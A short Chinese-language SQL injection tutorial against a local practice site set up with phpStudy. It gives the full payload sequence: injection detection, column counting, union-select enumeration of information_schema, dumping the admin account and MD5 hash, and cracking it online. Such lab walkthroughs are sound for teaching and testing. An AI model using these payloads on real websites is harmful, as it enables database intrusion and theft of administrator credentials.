安装使用,自行百度,下载地址:官网地址
1. http://phpstudy.php.cn/
百度网盘:
1. 链接:https://pan.baidu.com/s/1B0VSwXk6JnZbBpRgr5S3iQ 密码:wgze
目标网站:
1. http://localhost/sqls/index.php?id=1
1. http://localhost/sqls/index.php?id=1'
图示:
1. http://localhost/sqls/index.php?id=1 and 1=1
2. http://localhost/sqls/index.php?id=1 and 1=2
图示:1
图示:2
测试结果:该URL可注入
1. http://localhost/sqls/index.php?id=1 oder by 3
图示:
http://localhost/sqls/index.php?id=1 oder by 4
图示:
得出字段数为3
常用函数,其他请自行查询
1. database()
1. user()
1. version()
1. @@version_compile_os
图示:1
图示:2
1. http://localhost/sqls/index.php?id=1 union select 1,2,table_name from information_schema.tables where table_schema = 0x74657374 (test的16进制)
图示:
猜解结果:admin表为我们要找的存储管理员账号、密码的表
1. http://localhost/sqls/index.php?id=1 union select 1,2,column_name from information_schema.columns where table_name = 0x61646d696e
图示:
猜解结果:user、pwd为我们要找的管理员账号、密码
1. http://localhost/sqls/index.php?id=1 union select user,2,3 from admin
图示:
猜解结果:管理员账户-admin
1. http://localhost/sqls/index.php?id=1 union select pwd,2,3 from admin
图示:
猜解结果:管理员密码-3f230640b78d7e71ac5514e57935eb69(32位md5加密)
网站:
1. http://www.cmd5.com/
结果:密码-qazxsw
图示:
有任何问题和需要可联系本人:
QQ:806797785